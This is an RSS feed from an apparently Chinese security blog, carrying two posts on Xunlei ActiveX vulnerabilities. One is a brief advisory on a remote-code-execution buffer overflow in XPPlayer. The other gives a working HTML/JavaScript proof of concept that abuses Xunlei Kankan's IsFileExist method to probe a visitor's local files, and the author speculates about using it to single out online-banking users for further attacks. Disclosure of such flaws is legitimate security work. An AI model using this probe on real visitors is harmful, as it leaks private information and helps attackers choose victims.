hbs' blog - {网络安全}http://www.hb4.org/fuck by fuck! - RainbowSoft Studio Z-Blog 1.8 Walle Build 100427zh-CNCopyright 2007-2010 Your WebSite. Some Rights Reserved.Tue, 07 Sep 2010 07:42:27 +0800迅雷5 XPPlayer Activex控件远程代码执行0day漏洞a@b.com (hbslover)http://www.hb4.org/Article/17.htmTue, 05 Jan 2010 19:56:55 +0800http://www.hb4.org/Article/17.htm影响版本:
Xunlei5.9.14.1246以下所有版本
漏洞描述:
Xunlei 是一款在线加速下载程序。更多详细信息请参考:http://www.xunlei.com{F3E70CEA-956E-49CC-B444-73AFE593AD7F}Xunlei 提供的XPPlayer ActiveX控件存在缓冲区溢出,远程攻击者可以利用漏洞以应用程序权限执行任意指令。问题存在于DapFileSize,VodUrl等方法处理中,由于对参数缺少充分过滤,构建恶意WEB页,诱使用户访问,可导致以应用程序权限执行任意指令。
<*参考
superli@Safe-mail.net
*>
]]>{网络安全}http://www.hb4.org/Article/17.htm#commenthttp://www.hb4.org/http://www.hb4.org/feed.asp?cmt=17http://www.hb4.org/cmd.asp?act=tb&id=17&key=d6d67a47迅雷看看的漏洞能帮我们干些什么???a@b.com (hbslover)http://www.hb4.org/Article/xunlei_kankan_bug.htmMon, 16 Nov 2009 19:58:56 +0800http://www.hb4.org/Article/xunlei_kankan_bug.htm           迅雷看看除了能给我们看电影之外?还能给我们干点别的什么邪恶的事情呢???

           当然,这个漏洞的危害不大,不过泄漏你一点信息而已,前提是你安装了迅雷看看~漏洞是出现在ActiveX控件的一个函数上

            并没有判断调用者是谁,就胡乱的去执行相关的函数:.IsFileExist(文件名),返回值为0或1~~~

            <html>
                <body>
                <object classid="clsid:ACACC6EB-1FBA-4E13-A729-53AEB2DF54F8" id="target"></object>
                <input onclick="on()" type="button" value="test"/>
                <script language="javascript">
                function on()
                {
                        alert(target.IsFileExist("c:\\boot.ini"))
                }
                </script>
                </body>
                </html>

          上面是测试的html,我今天测试了一下,确实有效.(测试代码来自sebug).

           当然,想想,这个漏洞的危害不是那么的大,但是全国装迅雷看看的用户不再少数.

           那么全国装了迅雷看看,又同时使用网银的网友也不会再少数,当然,我就是这样

          这种方式只能判断某些人是网银用户,如果配合上一些比较邪恶的东西呢???那么效率会不会高点???

]]>{网络安全}http://www.hb4.org/Article/xunlei_kankan_bug.htm#commenthttp://www.hb4.org/http://www.hb4.org/feed.asp?cmt=9http://www.hb4.org/cmd.asp?act=tb&id=9&key=3c5df39c